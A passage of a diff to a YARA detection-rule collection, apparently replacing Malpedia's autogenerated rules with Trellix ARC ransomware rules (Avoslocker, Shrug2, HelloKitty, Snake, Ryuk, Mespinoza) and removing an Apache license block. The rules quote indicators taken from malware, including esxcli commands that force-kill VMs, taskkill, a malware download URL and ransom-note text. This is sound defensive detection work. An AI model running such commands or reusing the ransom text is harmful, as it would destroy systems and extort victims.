"https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Avoslocker.yar#L3-L27" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + logic_hash = "316aaab225797eedd62f9cfde1fdbd799a10441b3b15a8abc76141b57b36b1d3" score = 75 - quality = 75 + quality = 70 tags = "FILE" - version = "1" - tool = "yara-signator v0.6.0" - signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" - malpedia_license = "CC BY-SA 4.0" - malpedia_sharing = "TLP:WHITE" + Version = "v1" + DetectionName = "Ransom_Win_Avoslocker" + hash1 = "fb544e1f74ce02937c3a3657be8d125d5953996115f65697b7d39e237020706f" + hash2 = "43b7a60c0ef8b4af001f45a0c57410b7374b1d75a6811e0dfc86e4d60f503856" strings: - $sequence_0 = { e8???????? 68???????? 8d45f0 c745f0f4320110 } - $sequence_1 = { e8???????? 8b7df0 83c40c 037e74 c7467400000000 eb03 } - $sequence_2 = { 8bf0 53 ff742430 6a00 6a00 } - $sequence_3 = { 50 8b8528e5ffff 0f94c1 898d3ce5ffff 8b8d24e5ffff 8b048518ab0110 ff3401 } - $sequence_4 = { 8b8528e5ffff 8b048518ab0110 ff3401 ff15???????? 8bb540e5ffff 8bbd34e5ffff 85c0 } - $sequence_5 = { 8d84245c020000 50 c78424600200005630564d c78424640200005130394e ffd7 40 50 } - $sequence_6 = { 8b35???????? 8d442410 50 ff35???????? } - $sequence_7 = { 7309 8b04c5e84e0110 5d c3 33c0 } - $sequence_8 = { 0f8641010000 8b4c2420 83c714 8bff 837ff005 0f85fa000000 0fb707 } - $sequence_9 = { 3b0cc510900110 7427 40 83f82d 72f1 8d41ed } + $v1 = "CryptImportPublicKeyInfo failed. error: %d" fullword ascii + $v2 = "CryptStringToBinary failed. Err: %d" fullword ascii + $v3 = "encrypting %ls failed" fullword wide + $v4 = "CryptDecodeObjectEx 1 failed. Err: %p" fullword ascii + $v5 = "operator co_await" fullword ascii + $v6 = "drive %s took %f seconds" fullword ascii + $seq0 = { 8d 4e 04 5e e9 b1 ff ff ff 55 8b ec ff 75 08 ff } + $seq1 = { 33 c0 80 fb 2d 0f 94 c0 05 ff ff ff 7f eb 02 f7 } + $seq2 = { 8b 40 0c 89 85 1c ff ff ff 8b 40 0c 89 85 18 ff } condition: - 7 of them and filesize <253952 + ( uint16(0)==0x5a4d and filesize <1000KB and pe.imphash()=="a24c2b5bf84a5465eb75f1e6aa8c1eec" and (5 of them ) and all of ($seq*)) or ( all of them ) } -rule MALPEDIA_Win_Onionduke_Auto : FILE +rule TRELLIX_ARC_Shrug2_Ransomware : RANSOMWARE FILE { meta: - description = "autogenerated rule brought to you by yara-signator" - author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "bc18bebb-924f-5db1-bda1-575db25c40f5" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.onionduke" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.onionduke_auto.yar#L1-L117" - license_url = "N/A" - logic_hash = "2b5a6150c91e41c1ea04d8a66d543531da34a08cde94cd3e5e729e90a4473cac" + description = "Rule to detect the Shrug Ransomware" + author = "McAfee ATR Team" + id = "34e59296-db7c-551b-8d48-ffea20f2b4bb" + date = "2018-07-12" + modified = "2020-10-12" + reference = "https://blogs.quickheal.com/new-net-ransomware-shrug2/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_shrug2.yar#L1-L30" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + hash = "c89833833885bafdcfa1c6ee84d7dbcf2389b85d7282a6d5747da22138bd5c59" + logic_hash = "8c817b7fc4a0eada08b3d298c94b99a85c4e5a49a49d1c3fabdb0c6bbf56676b" score = 75 - quality = 75 - tags = "FILE" - version = "1" - tool = "yara-signator v0.6.0" - signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" - malpedia_license = "CC BY-SA 4.0" - malpedia_sharing = "TLP:WHITE" + quality = 20 + tags = "RANSOMWARE, FILE" + rule_version = "v1" + malware_type = "ransomware" + malware_family = "Ransom:W32/Shrug" + actor_type = "Cybercrime" + actor_group = "Unknown" strings: - $sequence_0 = { 33d2 895e68 66895658 8b550c 8d4202 c645fc04 8945ec } - $sequence_1 = { c1e81f 03c2 897dcc 0f84d0000000 897dd0 eb02 } - $sequence_2 = { 384b01 7506 40 380c18 } - $sequence_3 = { 894ee4 894ffc 8d4eec 8d57ec 8d5fec } - $sequence_4 = { 56 8bf1 837e0c00 751e 6a04 e8???????? 83c404 } - $sequence_5 = { 3bfb 72ac 5f 5e } - $sequence_6 = { 8b4e44 8b09 85d2 7405 } - $sequence_7 = { 8910 894ed0 8b56e0 8957e0 8b56e4 } - $sequence_8 = { e8???????? 83c404 33c0 eb66 8bc6 8d5001 } - $sequence_9 = { 80f90f 7f05 80c157 eb02 32c9 } + $s1 = "C:\\Users\\Gamer\\Desktop\\Shrug2\\ShrugTwo\\ShrugTwo\\obj\\Debug\\ShrugTwo.pdb" fullword ascii + $s2 = "http://tempacc11vl.000webhostapp.com/" fullword wide + $s3 = "Shortcut for @ShrugDecryptor@.exe" fullword wide + $s4 = "C:\\Users\\" fullword wide + $s5 = "http://clients3.google.com/generate_204" fullword wide + $s6 = "\\Desktop\\@ShrugDecryptor@.lnk" fullword wide condition: - 7 of them and filesize <671744 + ( uint16(0)==0x5a4d and filesize <2000KB) and all of them } -rule MALPEDIA_Win_Matrix_Banker_Auto : FILE +rule TRELLIX_ARC_Ransom_Linux_Hellokitty_0721 : RANSOMWARE FILE { meta: - description = "autogenerated rule brought to you by yara-signator" - author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "5e463068-e12b-5f8d-ab9f-c81457da2c25" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_banker" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.matrix_banker_auto.yar#L1-L118" - license_url = "N/A" - logic_hash = "8e0666cd40465e0b5fba82c6d7538e5812414aad17fe7eeb1cf9c0a79b729bb8" + description = "rule to detect Linux variant of the Hello Kitty Ransomware" + author = "Christiaan @ ATR" + id = "097b02e7-93d8-5d4f-9964-7b660b3cd7b9" + date = "2021-07-19" + modified = "2021-07-19" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Linux_HelloKitty0721.yar#L1-L28" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + logic_hash = "77a3809df4c7c591a855aaecd702af62935952937bb81661aa7f68e64dcf4fb4" score = 75 - quality = 75 - tags = "FILE" - version = "1" - tool = "yara-signator v0.6.0" - signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" - malpedia_license = "CC BY-SA 4.0" - malpedia_sharing = "TLP:WHITE" + quality = 70 + tags = "RANSOMWARE, FILE" + Rule_Version = "v1" + malware_type = "ransomware" + malware_family = "Ransom:Linux/HelloKitty" + hash1 = "ca607e431062ee49a21d69d722750e5edbd8ffabcb54fa92b231814101756041" + hash2 = "556e5cb5e4e77678110961c8d9260a726a363e00bf8d278e5302cb4bfccc3eed" strings: - $sequence_0 = { eb0b 8d4abf 80f905 7703 } - $sequence_1 = { 8d489f 80f905 7704 04a9 eb0a 8d48bf } - $sequence_2 = { 8d4a9f 80f905 7705 80c2a9 eb0b } - $sequence_3 = { 7705 80c2a9 eb0b 8d4abf 80f905 7703 80c2c9 } - $sequence_4 = { 80f905 7702 04c9 8d4ad0 } - $sequence_5 = { 80c2a9 eb0b 8d4abf 80f905 7703 80c2c9 } - $sequence_6 = { ff15???????? e8???????? 85c0 740a e8???????? 83f8ff } - $sequence_7 = { eb18 8d4a9f 80f905 7705 80c2a9 } - $sequence_8 = { eb18 8d4a9f 80f905 7705 } - $sequence_9 = { 8d489f 80f905 7704 04a9 eb0a 8d48bf 80f905 } + $v1 = "esxcli vm process kill -t=force -w=%d" fullword ascii + $v2 = "esxcli vm process kill -t=hard -w=%d" fullword ascii + $v3 = "esxcli vm process kill -t=soft -w=%d" fullword ascii + $v4 = "error encrypt: %s rename back:%s" fullword ascii + $v5 = "esxcli vm process list" fullword ascii + $v6 = "Total VM run on host:" fullword ascii + $v7 = "error lock_exclusively:%s owner pid:%d" fullword ascii + $v8 = "Error open %s in try_lock_exclusively" fullword ascii + $v9 = "Mode:%d Verbose:%d Daemon:%d AESNI:%d RDRAND:%d " fullword ascii + $v10 = "pthread_cond_signal() error" fullword ascii + $v11 = "ChaCha20 for x86_64, CRYPTOGAMS by <appro@openssl.org>" fullword ascii condition: - 7 of them and filesize <422912 + ( uint16(0)==0x457f and filesize <200KB and (8 of them )) or ( all of them ) } -rule MALPEDIA_Win_Poison_Rat_Auto : FILE +rule TRELLIX_ARC_Snake_Ransomware : RANSOMWARE FILE { meta: - description = "autogenerated rule brought to you by yara-signator" - author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "3901c97f-e38d-5819-991e-493be520fc51" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.poison_rat" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.poison_rat_auto.yar#L1-L118" - license_url = "N/A" - logic_hash = "b960cb72b2615d9b184a9e25264d3c87f1ec796c5d1b6fa8620d3a64be9786ae" + description = "Rule to detect Snake ransomware" + author = "McAfee ATR Team" + id = "b8f50af5-5568-5676-93a1-e818f08df0ce" + date = "2020-02-20" + modified = "2020-10-12" + reference = "https://dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_snake_ransomware.yar#L1-L26" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + hash = "e5262db186c97bbe533f0a674b08ecdafa3798ea7bc17c705df526419c168b60" + logic_hash = "3ae64fbacbf886b8d09abc3f5f8eb9c8bff809909a251f2d055056e6d12217a2" score = 75 - quality = 75 - tags = "FILE" - version = "1" - tool = "yara-signator v0.6.0" - signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" - malpedia_license = "CC BY-SA 4.0" - malpedia_sharing = "TLP:WHITE" + quality = 70 + tags = "RANSOMWARE, FILE" + rule_version = "v1" + malware_type = "ransomware" + malware_family = "Ransom:W32/EKANS" + actor_type = "Cybercrime" + actor_group = "Unknown" strings: - $sequence_0 = { 6880000000 8d85d4fcffff 52 50 e8???????? } - $sequence_1 = { 40 83f810 7cee 83ee10 4f 75ac 33c0 } - $sequence_2 = { 81e1ff000000 83c010 331cad30a44000 8b68f8 } - $sequence_3 = { e8???????? 8d8560ffffff 68???????? 50 e8???????? ffb6eca94000 } - $sequence_4 = { 81e5ff000000 333cad30a44000 8b68fc 33fd 8bea } - $sequence_5 = { f3a5 ff249578334000 8bc7 ba03000000 } - $sequence_6 = { 33c9 897c2418 8a6e08 8a4e09 } - $sequence_7 = { c1ea18 81e5ff000000 330c9530984000 8bd7 81e2ff000000 330c9530a44000 8b10 } - $sequence_8 = { 8b34b530984000 8b1cbd309c4000 c1e908 33f3 81e1ff000000 8b0c8d30804000 } - $sequence_9 = { 8bf1 c1f805 83e61f 8d3c8580c54000 c1e603 8b07 } + $snake = { 43 3A 2F 55 73 ?? 72 ?? 2F 57 49 4E 31 2F 67 6F 2F 73 ?? 63 2F 6A 6F 62 6E 68 62 67 6E 6E 69 66 70 6F 64 68 68 70 ?? 6D 66 2F 6E 66 64 6C 68 6F 70 68 6B 65 69 6A 61 64 67 66 64 64 69 6D 2F 6E 66 64 6C 68 6F 70 68 6B 65 69 6A 61 64 67 66 64 64 69 6D 2F 76 74 5F 73 74 ?? 69 6E 67 2E 67 6F 00 } condition: - 7 of them and filesize <101688 + ( uint16(0)==0x5a4d and filesize <11000KB) and all of them } -rule MALPEDIA_Win_Dropshot_Auto : FILE +rule TRELLIX_ARC_Ryuk_Ransomware : RANSOMWARE FILE { meta: - description = "autogenerated rule brought to you by yara-signator" - author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "f835fd17-f919-5a07-a5c9-cff4292c1163" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.dropshot" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.dropshot_auto.yar#L1-L98" - license_url = "N/A" - logic_hash = "98ce90f78c6e888102f62c73a346864796873af9c7b795369b519cebc67a4ac6" - score = 75 - quality = 75 - tags = "FILE" - version = "1" - tool = "yara-signator v0.6.0" - signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" - malpedia_license = "CC BY-SA 4.0" - malpedia_sharing = "TLP:WHITE" + description = "Ryuk Ransomware hunting rule" + author = "Christiaan Beek - McAfee ATR team" + id = "d3e67e26-3b34-5c28-a1c0-c4aeacd49df9" + date = "2019-04-25" + modified = "2021-07-12" + reference = "https://securingtomorrow.mcafee.com/other-blogs/mcafee-labs/ryuk-ransomware-attack-rush-to-attribution-misses-the-point/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Ryuk.yar#L1-L47" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + logic_hash = "43c0be708fa8a388dce6e1dd721e24329b5b08a942d99e9b2631c90155790c4b" + score = 50 + quality = 70 + tags = "RANSOMWARE, FILE" + rule_version = "v2" + malware_type = "ransomware" + malware_family = "Ransom:W32/Ryuk" + actor_type = "Cybercrime" + actor_group = "Unknown" strings: - $sequence_0 = { e8???????? 83c40c 6a04 6800100000 6804010000 6a00 ff15???????? } - $sequence_1 = { ff15???????? 5d c3 3b0d???????? f27502 } - $sequence_2 = { 6a64 ff15???????? 6800800000 6a00 } - $sequence_3 = { 6a05 ff15???????? ff15???????? 6a00 } - $sequence_4 = { eb05 e8???????? 68e8030000 ff15???????? } - $sequence_5 = { ff15???????? 6a04 6800100000 6808020000 } - $sequence_6 = { ff15???????? 6a00 ff15???????? 6a00 ff15???????? 6a05 } - $sequence_7 = { 6a00 6a00 68???????? 6a00 ff15???????? b801000000 } + $x1 = "C:\\Windows\\System32\\cmd.exe" fullword ascii + $x2 = "\\System32\\cmd.exe" fullword wide + $s1 = "C:\\Users\\Admin\\Documents\\Visual Studio 2015\\Projects\\ConsoleApplication54new crypted" ascii + $s2 = "fg4tgf4f3.dll" fullword wide + $s3 = "lsaas.exe" fullword wide + $s4 = "\\Documents and Settings\\Default User\\sys" fullword wide + $s5 = "\\Documents and Settings\\Default User\\finish" fullword wide + $s6 = "\\users\\Public\\sys" fullword wide + $s7 = "\\users\\Public\\finish" fullword wide + $s8 = "You will receive btc address for payment in the reply letter" fullword ascii + $s9 = "hrmlog" fullword wide + $s10 = "No system is safe" fullword ascii + $s11 = "keystorage2" fullword wide + $s12 = "klnagent" fullword wide + $s13 = "sqbcoreservice" fullword wide + $s14 = "tbirdconfig" fullword wide + $s15 = "taskkill" fullword wide + $op0 = { 8b 40 10 89 44 24 34 c7 84 24 c4 } + $op1 = { c7 44 24 34 00 40 00 00 c7 44 24 38 01 } condition: - 7 of them and filesize <483328 + ( uint16(0)==0x5a4d and filesize <400KB and (1 of ($x*) and 4 of them ) and all of ($op*)) or ( all of them ) } -rule MALPEDIA_Win_Greetingghoul_Auto : FILE +rule TRELLIX_ARC_RANSOM_RYUK_May2021 : RANSOMWARE FILE { meta: - description = "autogenerated rule brought to you by yara-signator" - author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "b976275f-692f-5ebe-b54a-1ebae523b638" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.greetingghoul" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.greetingghoul_auto.yar#L1-L122" - license_url = "N/A" - logic_hash = "0a3e95007607705383664f43202a90a64da5b8da6ba3c7b7040fd8c369e8d944" - score = 75 - quality = 75 - tags = "FILE" - version = "1" - tool = "yara-signator v0.6.0" - signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" - malpedia_license = "CC BY-SA 4.0" - malpedia_sharing = "TLP:WHITE" + description = "Rule to detect latest May 2021 compiled Ryuk variant" + author = "Marc Elias | McAfee ATR Team" + id = "6e415a9e-7373-50a8-ad57-f95220faed9c" + date = "2021-05-21" + modified = "2021-07-12" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/RANSOM_Ryuk.yar#L91-L113" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + hash = "8f368b029a3a5517cb133529274834585d087a2d3a5875d03ea38e5774019c8a" + logic_hash = "b379c1182e60ce8c777668386d8cbd08350dd2363770dec56502bf44aaf5d7f6" + score = 50 + quality = 70 + tags = "RANSOMWARE, FILE" + version = "0.1" strings: - $sequence_0 = { 56 57 8bf9 33f6 8a17 80fa20 } - $sequence_1 = { 750d 8a5702 83c702 bb10000000 } - $sequence_2 = { 03f1 eb03 83ceff 8a17 84d2 75a9 } - $sequence_3 = { 2bc8 7409 8b7df8 4e 43 } - $sequence_4 = { 751f 41 84c0 7405 83ea01 75eb 8b5dfc } - $sequence_5 = { 43 895dfc 47 eba7 5f 5e 83c8ff } - $sequence_6 = { 8a1a 8d5201 8a08 3acb 750c 40 84c9 } - $sequence_7 = { 33db 895dfc 8945f4 3806 740b } - $sequence_8 = { 83c404 891e 85db 746f 8b7508 0f57c0 57 } - $sequence_9 = { 7457 8d42d0 3c09 7708 } + $ryuk_filemarker = "RYUKTM" fullword wide ascii + $sleep_constants = { 68 F0 49 02 00 FF (15|D1) [0-4] 68 ?? ?? ?? ?? 6A 01 } + $icmp_echo_constants = { 68 A4 06 00 00 6A 44 8D [1-6] 5? 6A 00 6A 20 [5-20] FF 15 } condition: - 7 of them and filesize <696320 + uint16(0)==0x5a4d and uint32( uint32(0x3C))==0x00004550 and filesize <200KB and ($ryuk_filemarker or ($sleep_constants and $icmp_echo_constants)) } -rule MALPEDIA_Win_Pcshare_Auto : FILE +import "pe" + +rule TRELLIX_ARC_Ransom_Mespinoza : FILE { meta: - description = "autogenerated rule brought to you by yara-signator" - author = "Felix Bilstein - yara-signator at cocacoding dot com" - id = "7acb8456-1058-55a0-81ba-27e3cb590933" - date = "2023-12-06" - modified = "2023-12-08" - reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.pcshare" - source_url = "https://github.com/malpedia/signator-rules//blob/fbacfc09b84d53d410385e66a8e56f25016c588a/rules/win.pcshare_auto.yar#L1-L123" - license_url = "N/A" - logic_hash = "7ae15dd51d8c67d0995dcb010803cd76a95f2636c119f9eefe8dfedf04aaf2b7" + description = "rule to detect Mespinoza ransomware" + author = "Christiaan Beek @ McAfee ATR" + id = "70a76bc4-e0cb-5caa-bb64-1a732349d2ce" + date = "2020-11-24" + modified = "2020-11-24" + reference = "https://github.com/advanced-threat-research/Yara-Rules/" + source_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/ransomware/Ransom_Mespinoza.yar#L3-L27" + license_url = "https://github.com/advanced-threat-research/Yara-Rules//blob/fc51a3fe3b450838614a5a5aa327c6bd8689cbb2/LICENSE" + logic_hash = "e245fb9a71d86209690a6f4c7aa38c10dbd32cda2ea3ecde08d0d94e896381cb" score = 75 - quality = 75 + quality = 70 tags = "FILE" - version = "1" - tool = "yara-signator v0.6.0" - signator_config = "callsandjumps;datarefs;binvalue" - malpedia_rule_date = "20231130" - malpedia_hash = "fc8a0e9f343f6d6ded9e7df1a64dac0cc68d7351" - malpedia_version = "20230808" - malpedia_license = "CC BY-SA 4.0" - malpedia_sharing = "TLP:WHITE" + malware_family = "ransom_Win_Mespinoza" + hash1 = "e9662b468135f758a9487a1be50159ef57f3050b753de2915763b4ed78839ead" + hash2 = "48355bd2a57d92e017bdada911a4b31aa7225c0b12231c9cbda6717616abaea3" + hash3 = "e4287e9708a73ce6a9b7a3e7c72462b01f7cc3c595d972cf2984185ac1a3a4a8" strings: - $sequence_0 = { 8b48fc 03f7 8b78f8 8bd1 03fb c1e902 } - $sequence_1 = { 33ed 8d0c18 8bc3 99 } - $sequence_2 = { e8???????? 85c0 59 743e 8305????????20 8d0c9da0720610 } - $sequence_3 = { 8bc6 8b0c8da0720610 8d04c0 80648104fd 8d448104 8bc7 5f } - $sequence_4 = { 8d4c2418 50 51 e8???????? 83c40c 84c0 7439 } - $sequence_5 = { c1e705 f6441f0e01 7428 8b4c2474 81e2ffff2f00 895008 8b542440 } - $sequence_6 = { 51 eb07 8b16 8d441a02 } - $sequence_7 = { 85c0 7505 b8???????? 8078fffe 732f } - $sequence_8 = { 83c418 894c2424 b940000000 f3ab 66ab aa b940000000 } - $sequence_9 = { 3bd0 0f8c93fdffff 33ed 5b 8b74243c 8a4c241c } + $s1 = "update.bat" fullword ascii + $s2 = "protonmail.com" fullword ascii + $s3 = "Every byte on any types of your devices was encrypted." fullword ascii + $s4 = "To get all your data back contact us:" fullword ascii + $s5 = "What to do to get all data back?" fullword ascii + $s6 = "Don't try to use backups because it were encrypted too." fullword ascii + $op0 = { 83 f8 4b 75 9e 0f be 46 ff 8d 4d e0 ff 34 85 50 } + $op1 = { c6 05 34 9b 47 00 00 e8 1f 0c 03 00 59 c3 cc cc } + $op2 = { e8 ef c5 fe ff b8 ff ff ff 7f eb 76 8b 4d 0c 85 } condition: - 7 of them and filesize <893708 + ( uint16(0)==0x5a4d and filesize <600KB and pe.imphash()=="b5e8bd2552848bb7bf2f28228d014742" and (8 of them ) and 2 of ($op*)) or ( all of them ) } -/* - * YARA Rule Set - * Repository Name: Trellix ARC - * Repository: https://github.com/advanced-threat-research/Yara-Rules/ - * Retrieval Date: 2024-09-08 - * Git Commit: fc51a3fe3b450838614a5a5aa327c6bd8689cbb2 - * Number of Rules: 162 - * Skipped: 0 (age), 5 (quality), 0 (score), 0 (importance) - * - * - * LICENSE - * - * Apache License - Version 2.0, January 2004 - http://www.apache.org/licenses/ - - TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION - - 1. Definitions. - - "License" shall mean the terms and conditions for use, reproduction, - and distribution as defined by Sections 1 through 9 of this document. - - "Licensor" shall mean the copyright owner or entity authorized by - the copyright owner that is granting the License. - - "Legal Entity" shall mean the union of the acting entity and all - other entities that control, are controlled by, or are under common - control with that entity. For the purposes of this definition, - "control" means (i) the power, direct or indirect, to cause the - direction or management of such entity, whether by contract or - otherwise, or (ii) ownership of fifty percent (50%) or more of the - outstanding shares, or (iii) beneficial ownership of such entity. - - "You" (or "Your") shall mean an individual or Legal Entity - exercising permissions granted by this License. - - "Source" form shall mean the preferred form for making modifications, - including but not limited to software source code, documentation - source, and configuration files. - - "Object" form shall mean any form resulting from mechanical - transformation or translation of a Source form, including but - not limited to compiled object code, generated documentation, - and conversions to other media types. - - "Work" shall mean the work of authorship, whether in Source or - Object form, made available under the License, as indicated by a - copyright notice that is included in or attached to the work - (an example is provided in the Appendix below). - - "Derivative Works" shall mean any work, whether in Source or Object - form, that is based on (or derived from) the Work and for which the - editorial revisions, annotations, elaborations, or other modifications - represent, as a whole, an original work of authorship. For the purposes - of this License, Derivative Works shall not include works that remain - separable from, or merely link (or bind by name) to the interfaces of, - the Work and Derivative Works thereof. - - "Contribution" shall mean any work of authorship, including - the original version of the Work and any modifications or additions - to that Work or Derivative Works thereof, that is intentionally - submitted to Licensor for inclusion in the Work by the copyright owner - or by an individual or Legal Entity authorized to submit on behalf of - the copyright owner. For the purposes of this definition, "submitted" - means any form of electronic, verbal, or written communication sent - to the Licensor or its representatives, including but not limited to - communication on electronic mailing lists, source code control systems, - and issue tracking systems that are managed by, or on behalf of, the - Licensor for the purpose of discussing and improving the Work, but - excluding communication that is conspicuously marked or otherwise - designated in writing by the copyright owner as "Not a Contribution." - - "Contributor" shall mean Licensor and any individual or Legal Entity - on behalf of whom a Contribution has been received by Licensor and - subsequently incorporated within the Work. - - 2. Grant of Copyright License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - copyright license to reproduce, prepare Derivative Works of, - publicly display, publicly perform, sublicense, and distribute the - Work and such Derivative Works in Source or Object form. - - 3. Grant of Patent License. Subject to the terms and conditions of - this License, each Contributor hereby grants to You a perpetual, - worldwide, non-exclusive, no-charge, royalty-free, irrevocable - (except as stated in this section) patent license to make, have made, - use, offer to sell, sell, import, and otherwise transfer the Work, - where such license applies only to those patent claims licensable - by such Contributor that are necessarily infringed by their - Contribution(s) alone or by combination of their Contribution(s) - with the Work to which such Contribution(s) was submitted. If You - institute patent litigation against any entity (including a - cross-claim or counterclaim in a lawsuit) alleging that the Work - or a Contribution incorporated within the Work constitutes direct - or contributory patent infringement, then any patent licenses - granted to You under this License for that Work shall terminate - as of the date such litigation is filed. - - 4. Redistribution. You may reproduce and distribute copies of the - Work or Derivative Works thereof in any medium, with or without - modifications, and in Source or Object form, provided that You - meet the following conditions: - - (a) You must give any other recipients of the Work or - Derivative Works a copy of this License; and - - (b) You must cause any modified files to carry prominent notices - stating that You changed the files; and - - (c) You must retain, in the Source form of any Derivative Works - that You distribute, all copyright, patent, trademark, and - attribution notices from the Source form of the Work, - excluding those notices that do not pertain to any part of - the Derivative Works; and - - (d) If the Work includes a "NOTICE" text file as part of its - distribution, then any Derivative Works that You distribute must - include a readable copy of the attribution notices contained - within such NOTICE file, excluding those notices that do not - pertain to any part of the Derivative Works, in at least one - of the following places: within a NOTICE text file distributed - as part of the Derivative Works; within the Source form or - documentation, if provided along with the Derivative Works; or, - within a display generated by the Derivative Works, if and - wherever such third-party notices normally appear. The contents - of the NOTICE file are for informational purposes only and - do not modify the License. You may add Your own attribution - notices within Derivative Works that You distribute, alongside - or as an addendum to the NOTICE text from the Work, provided - that such additional attribution notices cannot be construed - as modifying the License. - - You may add Your own copyright statement to Your modifications and - may provide additional or different license terms and conditions - for use, reproduction, or distribution of Your modifications, or - for any such Derivative Works as a whole, provided Your use, - reproduction, and distribution of the Work otherwise complies with - the conditions stated in this License. - - 5. Submission of Contributions. Unless You explicitly state otherwise, - any Contribution intentionally submitted for inclusion in the Work - by You to the Licensor shall be under the terms and conditions of - this License, without any additional terms or conditions. - Notwithstanding the above, nothing herein shall supersede or modify - the terms of any separate license agreement you may have executed - with Licensor regarding such Contributions. - - 6. Trademarks. This License does not grant permission to use the trade - names, trademarks, service marks, or product names of the Licensor, - except as required for reasonable and customary use in describing the - origin of the Work and reproducing the content of the NOTICE file. - - 7. Disclaimer of Warranty. Unless required by applicable law or - agreed to in writing, Licensor provides the Work (and each - Contributor provides its Contributions) on an "AS IS" BASIS, - WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or - implied, including, without limitation, any warranties or conditions - of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A - PARTICULAR PURPOSE. You are solely responsible for determining the - appropriateness of using or redistributing the Work and assume any - risks associated with Your exercise of permissions under this License. - - 8. Limitation of Liability. In no event and under no legal theory, - whether in tort (including negligence), contract, or otherwise, - unless required by applicable law (such as deliberate and grossly - negligent acts) or agreed to in writing, shall any Contributor be - liable to You for damages, including any direct, indirect, special, - incidental, or consequential damages of any character arising as a - result of this License or out of the use or inability to use the - Work (including but not limited to damages for loss of goodwill, - work stoppage, computer failure or malfunction, or any and all - other commercial damages or losses), even if such Contributor - has been advised of the possibility of such damages. - - 9. Accepting Warranty or Additional Liability. While redistributing - the Work or Derivative Works thereof, You may choose to offer, - and charge a fee for, acceptance of support, warranty, indemnity, - or other liability obligations and/or rights consistent with this - License. However, in accepting such obligations, You may act only - on Your own behalf and on Your sole responsibility, not on behalf - of any other Contributor, and only if You agree to indemnify, - defend, and hold each Contributor harmless for any liability - incurred by, or claims asserted against, such Contributor by reason - of your accepting any such warranty or additional liability. - - END OF TERMS AND CONDITIONS - 